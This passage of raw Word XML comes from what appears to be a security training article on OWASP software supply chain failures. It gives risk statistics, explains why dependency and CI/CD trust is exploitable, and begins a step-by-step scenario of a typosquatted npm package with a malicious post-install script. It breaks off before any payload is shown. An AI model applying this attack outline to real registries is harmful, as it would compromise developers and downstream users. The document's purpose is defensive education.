                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143A80B9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>8.17</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">(Extremely high ease of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>exploitaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> once a dependency is poisoned)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="18F2C05E" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A445326" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Weighted</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A368755" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>5.23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="10D64721" w14:textId="77777777" w:rsidTr="00B064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CA8C9F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total Occurrences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C818B9F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>215,248</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="75EFBC46" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="077373EA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total CVEs with</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mapped CWEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="733290F3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0916CF55"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 xml:space="preserve">The data paints a clear picture: while only </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>11 CVEs</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are cleanly mapped to these specific structural CWEs, the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>8.17 Exploitability</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> score combined with a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>5.72% Average Incidence Rate</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> proves that supply chain failures are highly prevalent and effortlessly exploited. Once a malicious package slips past a registry or pipeline gate, the downstream execution is practically guaranteed, demanding automated, continuous tracking of the entire software bill of materials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C93C5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Core Concept &amp; Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225DC6A2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Definition: Technical Definition according to OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0299F512"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 xml:space="preserve">According to OWASP, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Software Supply Chain Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> refer to breakdowns, structural compromises, or security gaps occurring anywhere within the lifecycle of building, distributing, or updating software. This risk category encompasses vulnerabilities introduced through the reliance on third-party code, open-source frameworks, runtime environments, build-time tools, or cloud repositories. Rather than being restricted solely to code explicitly written by internal teams, it defines the risk inherited when an application integrates external components that are unmaintained, obsolete, vulnerable, or intentionally poisoned by malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B5A33" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. The "Why": Architectural Flaws &amp; Dependency Realities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A04C3E"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Software supply chain vulnerabilities exist primarily because modern application architecture relies heavily on abstract modularity without strict validation boundaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E99BEB7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Transitive Dependency Blindspot:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> When a developer imports a single trusted package (e.g., an HTTP client library), that package might automatically import ten other libraries, which in turn import dozens more. This creates a vast, nested tree of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>transitive dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Organizations often audit their direct imports but remain blind to deeply nested, unmaintained code running inside their production stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36444E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lack of Isolation (Shared Privilege Model):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> From an architectural standpoint, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>thirdparty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> libraries do not run inside sandboxes by default; they execute with the exact same operating system privileges, memory access rights, and network </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>permissions as the host application. A flaw or backdoor in a minor logging utility inherits the keys to the entire application castle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7254C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implicit Trust in Registries and Build Pipelines:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many CI/CD pipelines are engineered to dynamically fetch the "latest" minor version of a dependency from public registries (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PyPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>, or Maven Central) during the build process. This assumes public registries are intrinsically secure, allowing malicious code updates to bypass traditional source-code review gates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8EC0F5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lax Internal Build Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> CI/CD infrastructures are frequently highly complex and poorly segmented. If a pipeline engine possesses broad read/write access across repositories, or if developer workstations lack multi-factor authentication and strict local execution boundaries, the tooling responsible for generating the software becomes the primary attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D4381" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. The Mechanics: Step-by-Step Exploitation Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E639729"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 xml:space="preserve">To illustrate the mechanics, let us look at a modern, advanced supply chain compromise: a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Poisoned Package Upstream with a Malicious Post-Install Script</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (modeled after the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>ShaiHulud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> worm mechanism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAADDEE"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Step 1: Upstream Registry Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10CBBB"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 xml:space="preserve">An attacker identifies a popular, open-source utility library on a public registry. They compromise the developer's registry account (via credential stuffing or session hijacking) or publish a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>typosquatted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the package (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>reqeusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). Inside the package configuration file ( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), they insert a malicious directive that triggers execution the moment the library is downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264775D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sample Malicious Configuration Payload (</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343E7A1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
